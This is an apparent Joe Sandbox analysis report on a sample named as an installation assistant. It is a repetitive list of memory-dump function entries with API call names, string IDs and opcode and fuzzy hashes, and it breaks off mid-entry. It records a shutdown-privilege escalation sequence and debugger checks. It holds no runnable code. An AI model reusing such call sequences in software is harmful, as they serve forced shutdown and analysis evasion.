                                        • Source File: 00000007.00000002.2339580486.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                        • Associated: 00000007.00000002.2339554056.000000006BF40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2340911095.000000006C0E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2341738523.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2341781010.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2342607020.000000006C2B2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: CreateFile
                                        • String ID:
                                        • API String ID: 823142352-0
                                        • Opcode ID: a45bd3b60dd0e8c276be429b58f2359b8707531b6bcd28fe20699299d7201716
                                        • Instruction ID: 2dc6c3185138df8cb28b9d9f7cf74f0394906190dddd2fdd4614e9dda2622d7b
                                        • Opcode Fuzzy Hash: a45bd3b60dd0e8c276be429b58f2359b8707531b6bcd28fe20699299d7201716
                                        • Instruction Fuzzy Hash: DAD06C3210010DBBDF028E84DD06EDA3BAAFB88714F014000BE1856020C732E861AB90
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2339580486.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                        • Associated: 00000007.00000002.2339554056.000000006BF40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2340911095.000000006C0E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2341738523.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2341781010.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2342607020.000000006C2B2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a80223a001130716628e74e8086c402ab21fb308a8a87af2905342d4276af0b1
                                        • Instruction ID: dddcfcd49160081868d17e97d85d40bf85997d413c42dd535c0de8a6c7980fcf
                                        • Opcode Fuzzy Hash: a80223a001130716628e74e8086c402ab21fb308a8a87af2905342d4276af0b1
                                        • Instruction Fuzzy Hash:
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2339580486.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                        • Associated: 00000007.00000002.2339554056.000000006BF40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2340911095.000000006C0E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2341738523.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2341781010.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2342607020.000000006C2B2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: _strlen
                                        • String ID: g)''
                                        • API String ID: 4218353326-3487984327
                                        • Opcode ID: 1d2704309ea588572f6360b9ece49afcc7d0d2efb0bb69668923891640ce5075
                                        • Instruction ID: 2bcf0cab47e4c38dc211d182357c739ff517fabcb4c6f023be4e1d71f66b22f5
                                        • Opcode Fuzzy Hash: 1d2704309ea588572f6360b9ece49afcc7d0d2efb0bb69668923891640ce5075
                                        • Instruction Fuzzy Hash: 4C630371744B018FC728CF28C4D0B99B7F3BF99318B598A6DC0A64BA55EB74B44ACB41
                                        APIs
                                        • GetCurrentProcess.KERNEL32 ref: 6C0C5D6A
                                        • OpenProcessToken.ADVAPI32(00000000,00000028), ref: 6C0C5D76
                                        • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 6C0C5D84
                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000000,00000000,00000000), ref: 6C0C5DAB
                                        • NtInitiatePowerAction.NTDLL ref: 6C0C5DBF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2339580486.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                        • Associated: 00000007.00000002.2339554056.000000006BF40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2340911095.000000006C0E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2341738523.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2341781010.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2342607020.000000006C2B2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: ProcessToken$ActionAdjustCurrentInitiateLookupOpenPowerPrivilegePrivilegesValue
                                        • String ID: SeShutdownPrivilege
                                        • API String ID: 3256374457-3733053543
                                        • Opcode ID: 8a10dbd49a911b1306495271cba9595475649eb973052434d816ed67304d9a3b
                                        • Instruction ID: 2d7dbaf430851fdc0995a43eb9cd0b488e557a340e54928b56817fff2bbce463
                                        • Opcode Fuzzy Hash: 8a10dbd49a911b1306495271cba9595475649eb973052434d816ed67304d9a3b
                                        • Instruction Fuzzy Hash: 34F0B470648300BBEA106B24DD0EB6A7FF4EF45701F014608F945A61C1D7746A84DB92
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2339580486.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                        • Associated: 00000007.00000002.2339554056.000000006BF40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2340911095.000000006C0E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2341738523.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2341781010.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2342607020.000000006C2B2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: \j`7$\j`7$j
                                        • API String ID: 0-3644614255
                                        • Opcode ID: 1485219bad369f148596f4fd0062cee9e41f8338ed8c2eaa7fe012661e22ddba
                                        • Instruction ID: b9b1fa81de339f5179c902eda1ef04333d4fff0cbedc180aab6b5edc2f86519f
                                        • Opcode Fuzzy Hash: 1485219bad369f148596f4fd0062cee9e41f8338ed8c2eaa7fe012661e22ddba
                                        • Instruction Fuzzy Hash: 09422476A083828FCB14CF68C48066ABFE1ABCA354F14496EE4D5CB362D339D955CB53
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 6C1584B1
                                          • Part of subcall function 6C15993B: __EH_prolog.LIBCMT ref: 6C159940
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0F8000, based on PE: true
                                        • Associated: 00000007.00000002.2341738523.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2341781010.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID: 1$`)K$h)K
                                        • API String ID: 3519838083-3935664338
                                        • Opcode ID: fb81dbfa73f61bd15ec69b15b7f2714c80bc06e5f8e59c27703e0bd61042d5ed
                                        • Instruction ID: 3fa40a1cc2281ff3760e60aa400f189c9c1cf026fa14a38ab16d9cb7b032eaa7
                                        • Opcode Fuzzy Hash: fb81dbfa73f61bd15ec69b15b7f2714c80bc06e5f8e59c27703e0bd61042d5ed
                                        • Instruction Fuzzy Hash: C6F29DB0D00248DFDB11CFA8C894BDDBBB5AF59308F24409AD469AB781CB759E96CF11
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 6C14AEF4
                                          • Part of subcall function 6C14E622: __EH_prolog.LIBCMT ref: 6C14E627
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0F8000, based on PE: true
                                        • Associated: 00000007.00000002.2341738523.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2341781010.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID: $h%K
                                        • API String ID: 3519838083-1737110039
                                        • Opcode ID: 17cf35b80b03fcff345a605a7a63ea6e65b0b9a8420bc989c8341716572d16e6
                                        • Instruction ID: 5c5ba709fe016d722748af8b66f7e11955eb9573672f6daef16d09f070a295d2
                                        • Opcode Fuzzy Hash: 17cf35b80b03fcff345a605a7a63ea6e65b0b9a8420bc989c8341716572d16e6
                                        • Instruction Fuzzy Hash: DF537630901258DFDF15DFA8C994BEDBBB4AF19308F2480D8D45AA7691DB30AE89CF51
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 6C126CE5
                                          • Part of subcall function 6C0FCC2A: __EH_prolog.LIBCMT ref: 6C0FCC2F
                                          • Part of subcall function 6C0FE6A6: __EH_prolog.LIBCMT ref: 6C0FE6AB
                                          • Part of subcall function 6C126A0E: __EH_prolog.LIBCMT ref: 6C126A13
                                          • Part of subcall function 6C126837: __EH_prolog.LIBCMT ref: 6C12683C
                                          • Part of subcall function 6C12A143: __EH_prolog.LIBCMT ref: 6C12A148
                                          • Part of subcall function 6C12A143: ctype.LIBCPMT ref: 6C12A16C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0F8000, based on PE: true
                                        • Associated: 00000007.00000002.2341738523.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2341781010.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: H_prolog$ctype
                                        • String ID:
                                        • API String ID: 1039218491-3916222277
                                        • Opcode ID: 905438d877a3164863332086eaa33768b02ac55e5ee0ef1456ae7a8ba4df0a90
                                        • Instruction ID: c01e1893ff9d60acb9fcf21ec4de210c0987752bd5d408ff90c073c0a8432713
                                        • Opcode Fuzzy Hash: 905438d877a3164863332086eaa33768b02ac55e5ee0ef1456ae7a8ba4df0a90
                                        • Instruction Fuzzy Hash: 1B03BD35805288DFDF11CFA4C890BDDBBB0AF15318F24809AD85567A91DB386BCADF61
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0F8000, based on PE: true
                                        • Associated: 00000007.00000002.2341738523.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2341781010.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 3J$`/J$`1J$p0J
                                        • API String ID: 0-2826663437
                                        • Opcode ID: 0ce0cf568756059b319bec402cc4c845d2048d3ed56d6c8deb0de92fa915ba20
                                        • Instruction ID: 3120bf5f48c562fb2cfdf70ec870aeb26ffcc9edb856feb0f2bdef9e50ef3c3a
                                        • Opcode Fuzzy Hash: 0ce0cf568756059b319bec402cc4c845d2048d3ed56d6c8deb0de92fa915ba20
                                        • Instruction Fuzzy Hash: 7941F772F10A201AB3488E6A8C855667FC3C7CA347B4AC33DD565C76D9DABDC50782A4
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0F8000, based on PE: true
                                        • Associated: 00000007.00000002.2341738523.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2341781010.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID: W
                                        • API String ID: 3519838083-655174618
                                        • Opcode ID: ea00faa881669fc0c82860575f49db2074e6a46241474c433f0857494c018303
                                        • Instruction ID: 937262d0fed2318ca7d0d276ab902d83268d28a945e1c009af3e3e2558cee81c
                                        • Opcode Fuzzy Hash: ea00faa881669fc0c82860575f49db2074e6a46241474c433f0857494c018303
                                        • Instruction Fuzzy Hash: 8AB28AB4A01259DFDB01CFA8C484B9EBBB4BF19318F244099E865EB782C775ED51CB60
                                        APIs
                                        • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 6C0D0279
                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 6C0D0283
                                        • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 6C0D0290
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2339580486.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                        • Associated: 00000007.00000002.2339554056.000000006BF40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2340911095.000000006C0E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2341738523.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2341781010.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2342607020.000000006C2B2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                        • String ID:
                                        • API String ID: 3906539128-0
                                        • Opcode ID: 7acaf03aa0363c1224a611c894b8db40f360b623524d0509f4d6957d964a5e91
                                        • Instruction ID: 03a90fabd25b6d492cc20120d4c2e2d676172c10174cf3cf0dce6b527f54d733
                                        • Opcode Fuzzy Hash: 7acaf03aa0363c1224a611c894b8db40f360b623524d0509f4d6957d964a5e91
                                        • Instruction Fuzzy Hash: BD31B774E01218ABCB21DF68D9887DDBBF4BF08314F5042DAE51DA7650EB709B858F45
                                        APIs
                                        • GetCurrentProcess.KERNEL32(?,?,6C0CF235,?,?,?,?), ref: 6C0CF19F
                                        • TerminateProcess.KERNEL32(00000000,?,6C0CF235,?,?,?,?), ref: 6C0CF1A6
                                        • ExitProcess.KERNEL32 ref: 6C0CF1B8
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2339580486.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                        • Associated: 00000007.00000002.2339554056.000000006BF40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2340911095.000000006C0E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2341738523.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2341781010.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2342607020.000000006C2B2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: Process$CurrentExitTerminate
                                        • String ID:
                                        • API String ID: 1703294689-0
                                        • Opcode ID: 6e9936dcb1352f8c88cd360ddaf7bb6e0f90317362cc706aaf573c2e5440f3be
                                        • Instruction ID: d1c72ed13847ed910d61d993d5b414a70bc9e8ff2536044e79cb66c4657fbe9b
                                        • Opcode Fuzzy Hash: 6e9936dcb1352f8c88cd360ddaf7bb6e0f90317362cc706aaf573c2e5440f3be
                                        • Instruction Fuzzy Hash: 4AE0B632201108AFCF026F95D918A8D3BB9FB46A56F164414FC29C6621CF35E981DA92
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 6C14489B
                                          • Part of subcall function 6C145FC9: __EH_prolog.LIBCMT ref: 6C145FCE
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0F8000, based on PE: true
                                        • Associated: 00000007.00000002.2341738523.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2341781010.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID: @ K
                                        • API String ID: 3519838083-4216449128
                                        • Opcode ID: 2aafbb27e948f5792f5f0ae65a5e3f4f4742fa89f16e976c1927d8ca4eeab830
                                        • Instruction ID: 872061e5417442687b3bac7942a2be224763036e0358beca90b3a67024208f50
                                        • Opcode Fuzzy Hash: 2aafbb27e948f5792f5f0ae65a5e3f4f4742fa89f16e976c1927d8ca4eeab830
                                        • Instruction Fuzzy Hash: 70D1F371D042148FEB14CFA4C490BDEB7B6FF94318F29C16AE416ABB84CB749885CB55
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0F8000, based on PE: true
                                        • Associated: 00000007.00000002.2341738523.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2341781010.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID: x=J
                                        • API String ID: 3519838083-1497497802
                                        • Opcode ID: c284c417a2f68c1c742bc951fc924e558872fa0b35763257f7574c1e26c9a400
                                        • Instruction ID: ba0288290c599f86e3bae185afd0ff35913dbe03b3e28629e228c443b0d97bef
                                        • Opcode Fuzzy Hash: c284c417a2f68c1c742bc951fc924e558872fa0b35763257f7574c1e26c9a400
                                        • Instruction Fuzzy Hash: 6F916831D011199ADB04DFA5D890BEDB7F1AF46308F20816ADC7167AA1DB3269CBCB90
                                        APIs
                                        • std::invalid_argument::invalid_argument.LIBCONCRT ref: 6C0C78B0
                                        • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 6C0C80D3
                                          • Part of subcall function 6C0C9379: RaiseException.KERNEL32(E06D7363,00000001,00000003,6C0C80BC,00000000,?,?,?,6C0C80BC,?,6C0F554C), ref: 6C0C93D9
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2339580486.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                        • Associated: 00000007.00000002.2339554056.000000006BF40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2340911095.000000006C0E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2341738523.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2341781010.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2342607020.000000006C2B2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: ExceptionFeaturePresentProcessorRaisestd::invalid_argument::invalid_argument
                                        • String ID:
                                        • API String ID: 915016180-0
                                        • Opcode ID: 46b762ee4661e129b6501066dc4a05b7ec9893f6245c2d52b87f1f509d2b3429
                                        • Instruction ID: d4c738fa4723d940a197b13b042615ae257066c6dae3576c4e5d5d7867da4c1f
                                        • Opcode Fuzzy Hash: 46b762ee4661e129b6501066dc4a05b7ec9893f6245c2d52b87f1f509d2b3429
                                        • Instruction Fuzzy Hash: 99B17E71A046059BDB09CF95C8817DDBBF4FB45318F64822AE826E7B80D33CAA45CF95
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0F8000, based on PE: true
                                        • Associated: 00000007.00000002.2341738523.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2341781010.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID:
                                        • API String ID: 3519838083-0
                                        • Opcode ID: 9c3421dad5d14781272ec358f91f3a3ab5cfaafabcf0205709a2c9463218eeaf
                                        • Instruction ID: c505504f47e8aa6eae6751670dcfd67428f1639864a5f571528372ba9470882d
                                        • Opcode Fuzzy Hash: 9c3421dad5d14781272ec358f91f3a3ab5cfaafabcf0205709a2c9463218eeaf
                                        • Instruction Fuzzy Hash: 8DB2AB30A04758CFDB21CF6AC894B9EBBF1BF15308F508599D49AA7E81D770A999CF40
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0F8000, based on PE: true
                                        • Associated: 00000007.00000002.2341738523.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2341781010.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: @4J$DsL
                                        • API String ID: 0-2004129199
                                        • Opcode ID: 9b82dfd3553fe836d7aa24bd6b5882a619f6ea42a248f1f14d7e615b1deddf65
                                        • Instruction ID: 5c37e069a27c3dc725e8371fdd8aecba8c25768d5dd8080c456a6969e7972db0
                                        • Opcode Fuzzy Hash: 9b82dfd3553fe836d7aa24bd6b5882a619f6ea42a248f1f14d7e615b1deddf65
                                        • Instruction Fuzzy Hash: 19219137AA49564BE74CCA28DC33EBD2681E744305B89527EED4BCB3D1DF5C8800C648
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0F8000, based on PE: true
                                        • Associated: 00000007.00000002.2341738523.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2341781010.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: @
                                        • API String ID: 0-2766056989
                                        • Opcode ID: f76254a8391bbbc56ee5761849d9b464ca1ca2a3d131f1b477d5a7e0a80fcda2
                                        • Instruction ID: 49ebd66112e3d0b43613f2808680e9f097adbc7e5ddbdbb07ff639ac0f7f796a
                                        • Opcode Fuzzy Hash: f76254a8391bbbc56ee5761849d9b464ca1ca2a3d131f1b477d5a7e0a80fcda2
                                        • Instruction Fuzzy Hash: 8D1207B29083158FC358DF4AD44045BF7E2BFC8714F1A8A2EE898A7311D770E9568BC6
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0F8000, based on PE: true
                                        • Associated: 00000007.00000002.2341738523.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2341781010.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: __aullrem
                                        • String ID:
                                        • API String ID: 3758378126-0
                                        • Opcode ID: d1b669466a100d6f0f6c84f42758606c7eb5b4ffe16e73214497a835af333093
                                        • Instruction ID: 50d5082ef6da613dc81bc1b19770fe4eb4c46f638e6ec5483098e187c860ae07
                                        • Opcode Fuzzy Hash: d1b669466a100d6f0f6c84f42758606c7eb5b4ffe16e73214497a835af333093
                                        • Instruction Fuzzy Hash: 4551C971B092859BD710CF5AC4C06EDFBF6EF7A214F18C05EE8C897242D27A599AC760
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0F8000, based on PE: true
                                        • Associated: 00000007.00000002.2341738523.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2341781010.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: @
                                        • API String ID: 0-2766056989
                                        • Opcode ID: b4ce60841bca8fd945d7956f1acfe73c36a86ce5a82225692ce6a5b8030d2b38
                                        • Instruction ID: 9dd2b283d96eb3d05bca565892915ea06993caf347f6e85d4e70024111aa31a6
                                        • Opcode Fuzzy Hash: b4ce60841bca8fd945d7956f1acfe73c36a86ce5a82225692ce6a5b8030d2b38
                                        • Instruction Fuzzy Hash: 01D13E729083148FC758DF4AD44005BF7E2BFC8314F1A892EF899A7315DB70A9568BC6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0F8000, based on PE: true
                                        • Associated: 00000007.00000002.2341738523.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2341781010.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: (SL
                                        • API String ID: 0-669240678
                                        • Opcode ID: 403d64dc1b872b29255918294ce527b86f393edeaddcf848938bb8168c435548
                                        • Instruction ID: be20a771e9f4fae7c8cc5fadad3daed552eeb89efd3b5996adcad8ba752af892
                                        • Opcode Fuzzy Hash: 403d64dc1b872b29255918294ce527b86f393edeaddcf848938bb8168c435548
                                        • Instruction Fuzzy Hash: 52519473E208214AD78CCE24DC2177572D2E784310F8BC2B99D8BAB6E6CD78989187C4
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0F8000, based on PE: true
                                        • Associated: 00000007.00000002.2341738523.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
